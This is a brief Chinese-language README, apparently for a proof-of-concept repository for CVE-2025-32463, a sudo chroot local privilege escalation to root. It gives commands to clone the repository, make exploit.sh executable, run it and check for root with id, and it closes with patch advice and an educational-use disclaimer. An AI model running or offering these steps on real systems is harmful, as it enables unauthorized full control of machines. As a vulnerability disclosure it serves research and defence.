Linux 中通过 Sudo chroot 实现的本地权限提升至 Root
CVE-2025-32463 是 Sudo 二进制文件中的一个本地权限提升漏洞。该漏洞允许本地用户在特定配置错误或精心构造的输入下将权限提升至 root。该问题由 Rich Mirch 发现。
低权限的攻击者可以利用此漏洞获取 root 访问权限,从而完全控制系统。
git clone https://github.com/kh4sh3i/CVE-2025-32463.git
cd CVE-2025-32463
chmod +x exploit.sh
id
./exploit.sh
id
sudo 更新到最新的补丁版本。本概念验证仅供教育和研究目的使用。未经授权在任何系统上运行此程序是非法且不道德的行为。